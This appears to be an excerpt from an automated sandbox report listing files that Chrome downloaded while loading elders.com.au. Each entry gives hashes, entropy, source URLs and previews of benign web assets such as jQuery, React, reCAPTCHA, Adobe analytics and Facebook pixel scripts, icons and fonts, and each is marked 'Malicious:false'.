                                                                                                                                    SHA-512:84685AF6B7939E75D0CDF62D370B364C1A4FF67485B8A03646E60D669B4B5A6B86E10BDB97FF466B7C8310E1F09597F517F65126B1B9979C8E3B9E5DE910BD43
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.js`..function AppMeasurement(e){var t=this;t.version="2.27.0";var n,a,i=window;i.s_c_in||(i.s_c_il=[],i.s_c_in=0),t._il=i.s_c_il,t._in=i.s_c_in,t._il[t._in]=t,i.s_c_in++,t._c="s_c";try{n=i.AppMeasurement,(a=n.Cc)||(a=null)}catch(e){}var r,o,c,s=i;try{for(r=s.parent,o=s.location;r&&r.location&&o&&""+r.location!=""+o&&s.location&&""+r.location!=""+s.location&&r.location.host===o.host;)r=(s=r).parent}catch(e){}t.log=function(e){try{console.log(e)}catch(e){}},t.bb=function(e){return""+parseInt(e)==""+e},t.replace=function(e,t,n){return!e||0>e.indexOf(t)?e:e.split(t).join(n)},t.escape=function(e){var n,a;if(!e)return e;for(e=encodeURIComponent(e),n=0;7>n;n++)a="+~!*()'".substring(n,n+1),0<=e.indexOf(a)&&(e=t.replace(e,a,"%"+a.charCodeAt(0).toString(16).toUpperCase()));return e},t.unescape=function(e){if(!e)return e;e=0<=e.indexOf("+")?t.replace(e,"+"," "):e;try{return de
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 157192, version 774.256
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):157192
                                                                                                                                    Entropy (8bit):7.996404310886749
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:3072:AeqpbFGFxHY0qqD6sTqOmtIw+eW7vMNhGRWcUJfiCE:A1ZUFJYsZOOmtIw+t7ShGRWDc
                                                                                                                                    MD5:76CF3FF0DBD23DD4504E2089F0DF4ACB
                                                                                                                                    SHA1:BD2958CF51CC0A7B5C11A0B5C84101F35C2799A0
                                                                                                                                    SHA-256:340E6D7F301471E307E50C2ED43FE45DEBC8EBBF24FEBEF17B24F0B06F8883F2
                                                                                                                                    SHA-512:C957943B64F990E24838268E3F1A6E6B4A583AEAC6B83588FC01D269A096A888FA4DC2E16E96D23C3A84D7EB0F498C5FBA55AACD966D0DCE7C5A50449431A49A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/webfonts/free-fa-solid-900.woff2
                                                                                                                                    Preview:wOF2......f.......)...e..........................6.$. .`..P...f.. .T..m. %.....L......y.....SA.....PUUUU5)!.1.v...*..O~.._..w..._..............S`0...0-.q.=^.....~..L.^R.[..'..P..Be.)..W.U....*...4......(..f.;....".z.h..ej..0....R:.,X.',.Usz.\.m..l}.Q..'t...{N.......r...VH...Nr..M.F."..n...?oF0".!.y1.$..D...n..~.g.d;$.c|........d!VS......O..M%......G<!.. ........D..C.pQ.....T2.y......Gz.Gi.........U@...@.".._..f...'+..=..[u.VH.......fr..t....6.j.R..J..PF.J.....8H..14`...~K...&...oml....g..{.m.?`L........s...iR.iT.Y.*.....n8.......B...N.,.$.(.W ..wZ!QHk~.F..N^#.i."U..................@J..u.lZ.Ul.f\.8E.%.-pIi..u.u.5..~].k.w.K..z.A?O...~i3..Z.jwV.%.h.#..6...c.i.\ .F.9.(.RMZ5i.i]....}.;.......~.}G....V.N.S..y..xF.. ...^....7%4.MuZS..`..`.. .. . ...x.?..A.A..l..%+....~^.=...1....f$v.u.h+.....iO.i.[.q.(lW....C.G.)...{....r!.o.....j...h..w....7O g.....=#z..%..n...]p.l4.+.z5...B.......~..!.)..%==......U.oS.y49;.$.,.)v!.S..$.........{."....jJ.....i...D......j{.j.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1653)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1800
                                                                                                                                    Entropy (8bit):5.527858380938343
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:h6bLt/B26bBfdwSKKWA8PGdwSKKXAIOP/B:h2BB2qCRFPPJRcxOP/B
                                                                                                                                    MD5:28400EE7BA0A3A5E5EE5C09C1F2E6353
                                                                                                                                    SHA1:A1AE59765A3FC0AE93F564489AE1BE7F8D9F83B6
                                                                                                                                    SHA-256:A2AEDBF833ED5A8601653D379C6B33EB4A8177DD1DB4302B8BDC372DAC7B8C80
                                                                                                                                    SHA-512:1E62957340D27B6AEAB6A579DF984512090E27972264B2BDA68E0EFF7646EDA96D8EC802216AE910CFEC46226B18278FB18660231C9B6C952C37FD40D7C7E79F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js', "<script>\nconsole.log('Global | Ad Pixel Started');\n</script>\n\n Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '842278510644971');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=842278510644971&ev=PageView&noscript=1\n
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):198
                                                                                                                                    Entropy (8bit):5.01142858375393
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:tRBRNq8Ns+IjSKcvSuXF4q7SLvDmJS4RKb58FNQrFuHrQddQ1Eo6GSyrJVAej+Kh:tnrrzSuzumc4slZRIkfEJVRnGhk5
                                                                                                                                    MD5:9D9473FD130B0A7C6B8E9AF9E592519B
                                                                                                                                    SHA1:0C03C3B2C9895B24902BF0E56B4DCBBEAB3623AF
                                                                                                                                    SHA-256:DC4EE6726A4F0D64C20C6C287B4D05A81462E66D4CCE140DDF74041CC86CEC36
                                                                                                                                    SHA-512:7DF3656954DD331CA2ADAF0EFFF513B9F74FB05D3E2FEE76A940C7574CA62FB0CEE6F7698AC1EE2BE6D9ED9D089B7EEAED7049BF59C82EE2B32CA3221732CB11
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg">. <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/>.</svg>
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 384 x 384, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):12378
                                                                                                                                    Entropy (8bit):7.909076338338389
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:Muvw/P18FkjHOnr8TLhMOEJRm4Z4NBSQoeydWcKFkj:M7d82jHOnrkSzJRuNIReywF4
                                                                                                                                    MD5:1D137F6E42BD3F8A9482EAFB0C92D735
                                                                                                                                    SHA1:2A06B145558B7DB2502F7DB1FF0DBEA57E8F92E0
                                                                                                                                    SHA-256:448CA01DBDB41B4957CFF33D67FB0743EE954D78ACA68670F08851096626A95F
                                                                                                                                    SHA-512:9FA0FB01BDC3BA93D6D67292F8174CE7647F318105BC39B53829087C105661C286A304125A52800DAC6F88EC80686777FFDBEEDF8FF17610C46E51506FE144C6
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....)4*6.p../^IDATx...w..U.....I..{i...".."E.....kA]{.E..W...Z.w.U,....*..H....d...H......y|TH2.sN..9...C..U...9.34p..,....T.R....@Y.."........Z...V.....h`q0.wf....!LV...T....K...5....x..RZj,..oq..(.d..-..t(...+..s.i,=.#v...$B..j....F.5... iE..G[..X..jjL.H....g...z...)..`{%...K..../"ixp..x.Z^.........)....\.t&....l..F[.Sy.........*s...F.O"........".....0T@_,w..5vD$K.....^H. H..(........H.[b..2..R.......)..46D$G...?o.3r2.lm..o..c.;..x......\...O..e)..P....e.......pqp._'{.NR..!PT...2J._D....2....,.e..`{>...Ht......).8.\!K.f......|../".WG.0%T..Y...|n....U."".T..>..sk.7..S@...|...P......B.H."s...[.J......DD.2".G....i......e.p..MD..S..=.&.m.....|..........G...5i.....!.Q.>"".23h.f6.....W@.&.B.>S...I..B..mu*.E.X...3.CG...H.+...a.... ...}DD..@.P>/.4.B..~./"....{.X.....s.....~..I....ldh..`[.u].T..._D$..E..., ..) .y.e....HZ...{..R8..(..^.sO
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):437
                                                                                                                                    Entropy (8bit):7.209188484403921
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/whG2m9i7mtJT4RWbKwys5fmBwKRApTjG8Nw5DcF7:x/6O87+ThKwd5uBVR+j3CM
                                                                                                                                    MD5:718699785E49839E7D63CAFDDBF2F469
                                                                                                                                    SHA1:C1C2259187A940868B282B8A6CC3C126D60E1F53
                                                                                                                                    SHA-256:5A4AC3FA5B56A020D0AA16E532DFA437F1FA0BFD8DD476762C2E8EAA763F1D68
                                                                                                                                    SHA-512:AEF07610A6D4680CB4DC5105985AD1463D5414B7EEAE46FB39B19B47807C68E562CF291D548FEC9AD5D34B8E6E42AA617DD7FD0315D7FD6EA917994DACAC5604
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/social-share/youtube.png
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....JIDATx..1N.A....V..&.`.....'...7..N..G..[p.T .CK5..!...[.J.2.i._3/.?.eg...{J.u.eYZ..]0#%.......o...2....z..X...c..<..Q.;.t'....Z.+..G..C...9"....w.X..YP..H_..P.R.!+..?....(..i.2...^{..0...r.\j.?.e.$(...cy#@^.=@ .=..z.Z......&.h.].sW....l'.k..B0..{ ...Z.h.H.?.N.O..w.Kf..^?......`...d2|.xp.i..l.......L7]WI..3.yE.A...g|...r.4..$....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):89501
                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (538)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8529
                                                                                                                                    Entropy (8bit):5.53641559082188
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Zr4arfo91Mr8MfmNWtznjryEFh7GN3QTAJP1MlWrZXZ+Z6wrfr5:ZrbrUMrbf6Mznjr9h7ymlWrZsZ6wrfr5
                                                                                                                                    MD5:899004CC02C33EFC1F6694B1AEE587FD
                                                                                                                                    SHA1:8289B588E9944EBD754974D806E8BB5EE5489961
                                                                                                                                    SHA-256:377E9731DF07066631DC615291A3DBDBC923893629702F2E3B9B7A5775CC027B
                                                                                                                                    SHA-512:0EA82629AEFE013CF820CFD09544FDD8A782CA67067C101AC59238336A88C3A16000AA123B81E973D88E63763E365534C9757D906ACD48CFD12C7464EBF49BB5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operation",OPERATION_DELETE:"delete",OPERATION_MOVE:"move",DELETE_SUFFIX:"@Delete",TYPEHINT_SUFFIX:"@TypeHint",COPY_SUFFIX:"@CopyFrom",MOVE_SUFFIX:"@MoveFrom",ORDER:":order",REPLACE:":replace",DESTINATION:":dest",SAVE_PARAM_PREFIX:":saveParamPrefix",IGNORE_PARAM:":ignore",.REQUEST_LOGIN_PARAM:"sling:authRequestLogin",LOGIN_URL:"/system/sling/login.html",LOGOUT_URL:"/system/sling/logout.html"}});.(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Util=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (474)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):109931
                                                                                                                                    Entropy (8bit):4.717833542014338
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:VmjA0bi0UH0uMP5Mmhm6/mFah0nNRva1LMf4fU353ohNjN70dYq4G/ekVxQm4G0Q:YjDizH0Sah0nNR8Vs4G/BxMBQ
                                                                                                                                    MD5:05C3E7E7BA74B97802B32C6781212A24
                                                                                                                                    SHA1:90D578388B9EBFC83895B9533A9D15B8E537E108
                                                                                                                                    SHA-256:28348FEF6CB0ED8B2CEEB22DEAF824428FD13875D84C73D38F77DD216FC24E7F
                                                                                                                                    SHA-512:60523A0A168F439847F68F10E27E59CC31EB86BC19DDD860652436242FE982662E0F442D1B48B04207C56B527EA388EF925B0A06EA5C1F3E53C75CAA6B6E4515
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/**. * @license React. * react.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = global || self, factory(global.React = {}));.}(this, (function (exports) { 'use strict';.. var ReactVersion = '18.3.1';.. // ATTENTION. // When adding new symbols to this file,. // Please consider also adding to 'react-devtools-shared/src/backend/ReactSymbols'. // The Symbol used to tag the ReactElement-like types.. var REACT_ELEMENT_TYPE = Symbol.for('react.element');. var REACT_PORTAL_TYPE = Symbol.for('react.portal');. var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment');. var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode');. var RE
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (5552)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):77484
                                                                                                                                    Entropy (8bit):5.318928790524135
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicPj:RIT7OXVs9ZVKBvYj8wKcHPj
                                                                                                                                    MD5:4D64F8D073A1B5E2261C9B8D29A6C8E6
                                                                                                                                    SHA1:16420D7CF18AE6B2C663FDA3B0479F74F195BB2C
                                                                                                                                    SHA-256:7F8EF66DA0E5D2211C847BFE7370A26A85FC23999E7DF4C60867103E0ABCB3E3
                                                                                                                                    SHA-512:C2001E576950F6347FD3F05959D88711046F0842DED60D06EB58D0140434447918DC4F331E3835C5D6C942F591F6FA24697968B1CBA02A7DE275A13C0F2564B4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://connect.facebook.net/signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 25, 8-bit gray+alpha, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):790
                                                                                                                                    Entropy (8bit):7.290908119264289
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:Y3mua+m983KxlZBKTy3epJ2lRzRRDEMEFRI:Y3zU86lr3EAVdEO
                                                                                                                                    MD5:0C80233F7068DCFD314F03EC73BDC83A
                                                                                                                                    SHA1:E587B734EF34F975DA39DB5464888B323D52F580
                                                                                                                                    SHA-256:3AD78DBDCD7775F42FCCA4DE2CE075ABA164A30551B9342FE05800998EEEE0AD
                                                                                                                                    SHA-512:48C4CAA80FED3D5CFDD6C06EF3534D364D2EA5A413E1C77E3A70AC602978216BBD6FEDDCB4FE03D4D8CFC8777DA4651820DE9E593C21B4A632191BACC63EE2D0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/social-share/xicon.png
                                                                                                                                    Preview:.PNG........IHDR.............."&.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........pHYs...%...%.IR$.....tIME........E.+....IDAT8..KH.`...o.P.,... (.........B...M...+.(.-...."uQ.W...d..$.....T.M.w..G:...W...s/...4.l8...%M...gN.g...S..^lT..+.iw@..6.[....;.F.5.p..........ra..._.L.}.R....k.nD7..Vk.N...sUOTk.#....4.r..wE..X.f^..X9....>......../.r3.%..N.... .f$..v..h..E..}r..u.....RPhD.`.!!...P...,......=...t..Z.(..P..x#.y.t...~H.a.,..*-.F..{.7.....8../....za.M....*..|.+g.=A.euR@.=....f5H..p..v..L...C..fUl..1...M.I!.e K.~..J...).2f..j...[....).4F...L*.5......\..t.1}.z..y}......Q...j.....+.......%tEXtdate:create.2024-06-13T07:01:58+00:00.1.5...%tEXtdate:modify.2024-06-13T07:01:58+00:00.l.....(tEXtdate:timestamp.2024-06-13T07:02:10+00:00........IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2485)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):25552
                                                                                                                                    Entropy (8bit):5.2945880999454396
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYMpR8ZkvuF0vLO+UX6SCK:RIT7sZwuvL54WAcl/78
                                                                                                                                    MD5:10C383937833ACECCD386DDB586C1DF5
                                                                                                                                    SHA1:F16E354938A4012D78FC240140EAF8F3A1899D7E
                                                                                                                                    SHA-256:2D3169A3A072E870CA863AEB87FCE97D821C8B608397309BD64984354A111846
                                                                                                                                    SHA-512:D70130F2BDCED34E85FAC275372A4F17BFC2827E3B2096DFAA65DA18B704293749411086998D8B6C1A48B4EE92C1B74ECFC12B0702A6353C414F4469C5CE21A0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (701)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):558800
                                                                                                                                    Entropy (8bit):5.6661858145390775
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                    MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                    SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                    SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                    SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
                                                                                                                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):291981
                                                                                                                                    Entropy (8bit):5.1014349996806985
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:LYUdwzo64+dguiv6jk5zb5Dp1p3vAKK8kOk9UTX261IK:LYUdwzo64+du6jk5z1Dp1eVOLT71IK
                                                                                                                                    MD5:E592021EAFD59DE123415AB937A09F08
                                                                                                                                    SHA1:95C6AA47BA749A69830B1D3918303835654F4D75
                                                                                                                                    SHA-256:9ADC4D1EFBC0737998D624B6168CF38F1A241E3D22898942C9C3654C460419CD
                                                                                                                                    SHA-512:A3128F9AEE8B298500A85C4AA6FF24CAEC11A6AE15A84F4E2B0A9BE999B4B5640DBE2B02696EDD485437ADE448BF4BD3E22980E1DD2C2B34C6587327A6D1EDFA
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*******************************************************************************. * Copyright 2019 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/../**. * Element.matches(). * https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill. */.if (!Element.prototype.matches) {. Element.prototype.matches = Element.prototype.msMatchesSelector || Element.prototype.webkitMatchesSelector;.}..//
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):89501
                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
